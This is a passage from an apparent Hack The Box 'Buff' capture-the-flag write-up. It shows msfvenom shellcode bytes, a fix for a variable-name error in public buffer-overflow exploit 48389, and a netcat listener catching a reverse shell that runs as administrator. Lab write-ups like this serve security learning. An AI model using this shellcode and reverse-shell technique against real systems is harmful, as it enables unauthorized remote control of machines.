buf += b"\x7e\x9f\x25\x89\x4e\x52\x37\xce\x69\x8d\x42\x26\x8a"
buf += b"\x30\x55\xfd\xf0\xee\xd0\xe5\x53\x64\x42\xc1\x62\xa9"
buf += b"\x15\x82\x69\x06\x51\xcc\x6d\x99\xb6\x67\x89\x12\x39"
buf += b"\xa7\x1b\x60\x1e\x63\x47\x32\x3f\x32\x2d\x95\x40\x24"
buf += b"\x8e\x4a\xe5\x2f\x23\x9e\x94\x72\x2c\x53\x95\x8c\xac"
buf += b"\xfb\xae\xff\x9e\xa4\x04\x97\x92\x2d\x83\x60\xd4\x07"
buf += b"\x73\xfe\x2b\xa8\x84\xd7\xef\xfc\xd4\x4f\xd9\x7c\xbf"
buf += b"\x8f\xe6\xa8\x10\xdf\x48\x03\xd1\x8f\x28\xf3\xb9\xc5"
buf += b"\xa6\x2c\xd9\xe6\x6c\x45\x70\x1d\xe7\x60\x8f\x13\xf8"
buf += b"\x1c\x8d\x2b\x17\x82\x18\xcd\x7d\x2c\x4d\x46\xea\xd5"
buf += b"\xd4\x1c\x8b\x1a\xc3\x59\x8b\x91\xe0\x9e\x42\x52\x8c"
buf += b"\x8c\x33\x92\xdb\xee\x92\xad\xf1\x86\x79\x3f\x9e\x56"
buf += b"\xf7\x5c\x09\x01\x50\x92\x40\xc7\x4c\x8d\xfa\xf5\x8c"
buf += b"\x4b\xc4\xbd\x4a\xa8\xcb\x3c\x1e\x94\xef\x2e\xe6\x15"
buf += b"\xb4\x1a\xb6\x43\x62\xf4\x70\x3a\xc4\xae\x2a\x91\x8e"
buf += b"\x26\xaa\xd9\x10\x30\xb3\x37\xe7\xdc\x02\xee\xbe\xe3"
buf += b"\xab\x66\x37\x9c\xd1\x16\xb8\x77\x52\x26\xf3\xd5\xf3"
buf += b"\xaf\x5a\x8c\x41\xb2\x5c\x7b\x85\xcb\xde\x89\x76\x28"
buf += b"\xfe\xf8\x73\x74\xb8\x11\x0e\xe5\x2d\x15\xbd\x06\x64"

I copied the msfvenom command from the exploit and changed the -p flag to a plain reverse shell payload, adding my Kali IP and port to connect back to. The architecture, bad characters and output format stay the same as in the original command.

[tyco㉿4YE: ~/htb/buff]$ python 48389
Traceback (most recent call last):
  File "48389", line 50, in <module>
    overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
NameError: name 'payload' is not defined

One thing to note here is that this won't work right away. msfvenom names its variable buf, while the exploit expects payload, so running it fails with NameError: name 'payload' is not defined. We can fix this by adding payload = buf after the pasted buf lines so that the script runs.

[tyco㉿4YE:~/htb/buff]$ nc -nvlp 4447
listening on [any] 4447 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.198] 50029
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator
